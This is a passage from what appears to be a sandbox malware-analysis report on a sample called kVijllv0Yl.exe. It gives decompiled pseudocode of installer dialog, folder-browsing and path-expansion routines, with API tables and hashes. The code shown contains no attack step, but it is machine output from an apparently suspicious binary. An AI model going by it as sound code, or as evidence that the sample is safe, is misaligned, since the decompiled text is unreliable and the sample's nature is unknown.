						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                  0x00404790
                  0x00404796
                  0x00404798
                  0x0040479e
                  0x004047a4
                  0x004047b1
                  0x004047ba
                  0x004047bd
                  0x004047c0
                  0x004049e8
                  0x004049ef
                  0x00404a03
                  0x004049f1
                  0x004049f3
                  0x004049f6
                  0x004049f7
                  0x004049fe
                  0x004049fe
                  0x00404a0f
                  0x00404a1d
                  0x00404a20
                  0x00404a36
                  0x00404aae
                  0x00404ab1
                  0x00404ab3
                  0x00404abd
                  0x00404acb
                  0x00404acb
                  0x00404acd
                  0x00404ad7
                  0x00404add
                  0x00404afe
                  0x00404adf
                  0x00404aec
                  0x00404aec
                  0x00404add
                  0x00404ad7
                  0x00000000
                  0x00404ab1
                  0x00404a3b
                  0x00404a46
                  0x00404a4b
                  0x00404a52
                  0x00404a59
                  0x00404a63
                  0x00404a63
                  0x00404a67
                  0x00404a6c
                  0x00404a71
                  0x00404a87
                  0x00404a73
                  0x00404a73
                  0x00404a7b
                  0x00404a82
                  0x00404a7d
                  0x00404a7d
                  0x00404a7d
                  0x00404a7b
                  0x00404a8b
                  0x00404a8d
                  0x00404a9b
                  0x00404a9c
                  0x00404aa8
                  0x00404aab
                  0x00404aab
                  0x00404a6c
                  0x00000000
                  0x00404a59
                  0x00404a3d
                  0x00404a44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404b01
                  0x00404b01
                  0x00404b08
                  0x00404b7c
                  0x00404b83
                  0x00404b8f
                  0x00404b8f
                  0x00404b98
                  0x00404b9a
                  0x00404ba1
                  0x00404ba4
                  0x00404ba4
                  0x00404baa
                  0x00404bb1
                  0x00404bb4
                  0x00404bb4
                  0x00404bba
                  0x00404bc0
                  0x00404bc6
                  0x00404bc6
                  0x00404bd3
                  0x00404d20
                  0x00404d27
                  0x00404d44
                  0x00404d4a
                  0x00404d5c
                  0x00404d5c
                  0x00000000
                  0x00404bd9
                  0x00404bdb
                  0x00404be3
                  0x00404be7
                  0x00404be7
                  0x00404bef
                  0x00404c30
                  0x00404c32
                  0x00404c42
                  0x00404c45
                  0x00404c4a
                  0x00404c51
                  0x00404c54
                  0x00404cf6
                  0x00404cfc
                  0x00404d0a
                  0x00404d1b
                  0x00404d1b
                  0x00000000
                  0x00404d0a
                  0x00404c5a
                  0x00404c5d
                  0x00404c63
                  0x00404c68
                  0x00404c6a
                  0x00404c6c
                  0x00404c72
                  0x00404c79
                  0x00404c7e
                  0x00404c85
                  0x00404c88
                  0x00404c88
                  0x00404c8f
                  0x00404c9b
                  0x00404c9f
                  0x00404ca1
                  0x00404ca1
                  0x00404c91
                  0x00404c93
                  0x00404c93
                  0x00404cc1
                  0x00404ccd
                  0x00404cdc
                  0x00404cdc
                  0x00404cde
                  0x00404ce1
                  0x00404cea
                  0x00000000
                  0x00404bf1
                  0x00404bfc
                  0x00404bff
                  0x00404c04
                  0x00404c06
                  0x00404c0a
                  0x00404c1a
                  0x00404c24
                  0x00404c26
                  0x00404c29
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404c0c
                  0x00404c0c
                  0x00404c12
                  0x00404c14
                  0x00404c14
                  0x00404c15
                  0x00404c16
                  0x00000000
                  0x00404c0c
                  0x00404bef
                  0x00404bd3
                  0x00404b10
                  0x00000000
                  0x00404b26
                  0x00404b30
                  0x00404b35
                  0x00000000
                  0x00000000
                  0x00404b47
                  0x00404b4c
                  0x00404b58
                  0x00404b58
                  0x00404b5a
                  0x00404b69
                  0x00404b6b
                  0x00404b72
                  0x00404b75
                  0x00000000
                  0x00404b75
                  0x00404b10
                  0x004047c6
                  0x004047cb
                  0x004047d5
                  0x004047d6
                  0x004047df
                  0x004047ea
                  0x004047f5
                  0x004047fb
                  0x00404809
                  0x0040481e
                  0x00404823
                  0x0040482e
                  0x00404837
                  0x0040484c
                  0x0040485d
                  0x0040486a
                  0x0040486a
                  0x0040486f
                  0x00404875
                  0x00404877
                  0x0040487a
                  0x0040487f
                  0x00404884
                  0x00404886
                  0x00404886
                  0x004048a6
                  0x004048a6
                  0x004048a8
                  0x004048a9
                  0x004048ae
                  0x004048b1
                  0x004048b4
                  0x004048b8
                  0x004048bd
                  0x004048c2
                  0x004048c6
                  0x004048cb
                  0x004048d0
                  0x004048d2
                  0x004048da
                  0x004049a4
                  0x004049b7
                  0x00000000
                  0x004048e0
                  0x004048e3
                  0x004048e6
                  0x004048e9
                  0x004048e9
                  0x004048ef
                  0x004048f5
                  0x004048f8
                  0x004048fe
                  0x004048ff
                  0x00404904
                  0x0040490d
                  0x00404914
                  0x00404917
                  0x0040491a
                  0x0040491d
                  0x00404959
                  0x00404982
                  0x0040495b
                  0x00404968
                  0x00404968
                  0x0040491f
                  0x00404922
                  0x00404931
                  0x0040493b
                  0x00404943
                  0x0040494a
                  0x00404952
                  0x00404952
                  0x0040491d
                  0x00404988
                  0x00404989
                  0x00404995
                  0x00404995
                  0x004049a2
                  0x004049bd
                  0x004049c1
                  0x004049de
                  0x004049e3
                  0x004049e6
                  0x00000000
                  0x004049c3
                  0x004049c8
                  0x004049d1
                  0x00404d5e
                  0x00404d70
                  0x00404d70
                  0x004049c1
                  0x00000000
                  0x004049a2
                  0x004048da

                  APIs
                  • GetDlgItem.USER32 ref: 00404789
                  • GetDlgItem.USER32 ref: 00404796
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
                  • LoadBitmapA.USER32 ref: 004047F5
                  • SetWindowLongA.USER32 ref: 0040480F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                  • DeleteObject.GDI32(?), ref: 0040486F
                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                  • GetWindowLongA.USER32 ref: 004049A9
                  • SetWindowLongA.USER32 ref: 004049B7
                  • ShowWindow.USER32(?,00000005), ref: 004049C8
                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                  • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                  • GlobalFree.KERNEL32 ref: 00404BB4
                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                  • ShowWindow.USER32(?,00000000), ref: 00404D4A
                  • GetDlgItem.USER32 ref: 00404D55
                  • ShowWindow.USER32(00000000), ref: 00404D5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 1638840714-813528018
                  • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                  • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                  • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                  0x0040427b
                  0x00404282
                  0x0040428e
                  0x0040429c
                  0x004042a4
                  0x004042a8
                  0x004042ae
                  0x004042ae
                  0x004042ba
                  0x0040432e
                  0x00404335
                  0x0040440a
                  0x00404411
                  0x00404420
                  0x00404420
                  0x00404424
                  0x0040442a
                  0x00404437
                  0x00404439
                  0x00404439
                  0x00404447
                  0x0040444c
                  0x0040444f
                  0x00404456
                  0x00404459
                  0x00404490
                  0x00404492
                  0x00404498
                  0x0040449f
                  0x004044a1
                  0x004044a1
                  0x004044bd
                  0x004044f9
                  0x00000000
                  0x004044bf
                  0x004044c2
                  0x004044d6
                  0x004044d8
                  0x00000000
                  0x004044d8
                  0x0040445b
                  0x0040445f
                  0x0040448e
                  0x0040448e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404461
                  0x00404461
                  0x0040446e
                  0x00404473
                  0x00000000
                  0x00000000
                  0x00404477
                  0x00404479
                  0x00404479
                  0x00404484
                  0x00404487
                  0x0040448c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040448c
                  0x004044e7
                  0x004044ee
                  0x004044f5
                  0x004044fc
                  0x004044fc
                  0x00404501
                  0x00404503
                  0x0040450b
                  0x00404511
                  0x00404511
                  0x00404521
                  0x0040452b
                  0x00404533
                  0x00404549
                  0x00404535
                  0x00404539
                  0x00404539
                  0x00404533
                  0x0040454e
                  0x00404553
                  0x00404558
                  0x00404561
                  0x00404561
                  0x0040456a
                  0x0040456c
                  0x0040456c
                  0x00404578
                  0x00404580
                  0x0040458a
                  0x0040458a
                  0x0040458f
                  0x00000000
                  0x0040458f
                  0x00404459
                  0x00404413
                  0x0040441a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040441a
                  0x0040433b
                  0x00404341
                  0x0040435b
                  0x00404360
                  0x0040436a
                  0x00404371
                  0x00404380
                  0x00404383
                  0x00404386
                  0x0040438d
                  0x00404395
                  0x00404398
                  0x0040439c
                  0x004043a3
                  0x004043ab
                  0x00404403
                  0x004043ad
                  0x004043ae
                  0x004043b5
                  0x004043bf
                  0x004043c7
                  0x004043d4
                  0x004043e8
                  0x004043ec
                  0x004043ec
                  0x004043e8
                  0x004043f1
                  0x004043fc
                  0x004043fc
                  0x004043ab
                  0x00000000
                  0x00404360
                  0x0040434e
                  0x00000000
                  0x00000000
                  0x00404354
                  0x00000000
                  0x004042bc
                  0x004042bc
                  0x004042c8
                  0x004042d2
                  0x004042df
                  0x004042df
                  0x004042e5
                  0x004042ee
                  0x004042f7
                  0x004042fa
                  0x004042fd
                  0x00404305
                  0x00404308
                  0x0040430b
                  0x00404313
                  0x0040431a
                  0x00404321
                  0x00404595
                  0x004045a7
                  0x004045a7
                  0x0040432c
                  0x00000000
                  0x0040432c

                  APIs
                  • GetDlgItem.USER32 ref: 004042C1
                  • SetWindowTextA.USER32(?,?), ref: 004042EE
                  • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                  • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                  • lstrcmpiA.KERNEL32(mcchdhqnu,00420498,00000000,?,?), ref: 004043E0
                  • lstrcatA.KERNEL32(?,mcchdhqnu), ref: 004043EC
                  • SetDlgItemTextA.USER32 ref: 004043FC
                    • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                  • SetDlgItemTextA.USER32 ref: 00404549
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                  • String ID: A$C:\Users\user\AppData\Local\Temp$mcchdhqnu
                  • API String ID: 2246997448-1079521717
                  • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                  • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}





























                  0x00405aa7
                  0x00405aa7
                  0x00405aa7
                  0x00405aad
                  0x00405ab2
                  0x00405ac3
                  0x00405ac3
                  0x00405ace
                  0x00405ad0
                  0x00405ad5
                  0x00405ad8
                  0x00405ad9
                  0x00405ae0
                  0x00405ae2
                  0x00405ae8
                  0x00405aeb
                  0x00405aeb
                  0x00405cc0
                  0x00405cc0
                  0x00405cc4
                  0x00000000
                  0x00000000
                  0x00405af8
                  0x00405afe
                  0x00000000
                  0x00000000
                  0x00405b04
                  0x00405b05
                  0x00405b08
                  0x00405b0b
                  0x00405cb3
                  0x00405cbd
                  0x00405cbf
                  0x00405cbf
                  0x00405cb5
                  0x00405cb7
                  0x00405cb9
                  0x00405cba
                  0x00405cba
                  0x00000000
                  0x00405cb3
                  0x00405b11
                  0x00405b15
                  0x00405b1a
                  0x00405b29
                  0x00405b2c
                  0x00405b2e
                  0x00405b33
                  0x00405b36
                  0x00405b39
                  0x00405b3c
                  0x00405b3f
                  0x00405b42
                  0x00405c5d
                  0x00405c60
                  0x00405c90
                  0x00405c93
                  0x00405c98
                  0x00405c9c
                  0x00405c9c
                  0x00405ca1
                  0x00405ca2
                  0x00405ca7
                  0x00405caa
                  0x00405cac
                  0x00000000
                  0x00405cac
                  0x00405c62
                  0x00405c65
                  0x00405c7a
                  0x00405c81
                  0x00405c67
                  0x00405c6e
                  0x00405c6e
                  0x00405c89
                  0x00405c8c
                  0x00405c55
                  0x00405c56
                  0x00405c56
                  0x00000000
                  0x00405c8c
                  0x00405b4a
                  0x00405b4b
                  0x00405b51
                  0x00405b53
                  0x00405b6d
                  0x00405b6d
                  0x00405b74
                  0x00405b74
                  0x00405b7b
                  0x00405b7f
                  0x00405b7f
                  0x00405b80
                  0x00405b82
                  0x00405bbb
                  0x00405bbe
                  0x00405bce
                  0x00405bd1
                  0x00405bd9
                  0x00405bdf
                  0x00405bdf
                  0x00405c3b
                  0x00405c3b
                  0x00405c3d
                  0x00000000
                  0x00000000
                  0x00405be3
                  0x00405bea
                  0x00405beb
                  0x00405bed
                  0x00405c07
                  0x00405c15
                  0x00405c1b
                  0x00405c1d
                  0x00405c38
                  0x00405c38
                  0x00405c38
                  0x00000000
                  0x00405c38
                  0x00405c23
                  0x00405c2e
                  0x00405c34
                  0x00405c36
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c36
                  0x00405bef
                  0x00405bf2
                  0x00000000
                  0x00000000
                  0x00405c01
                  0x00405c03
                  0x00405c05
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c05
                  0x00000000
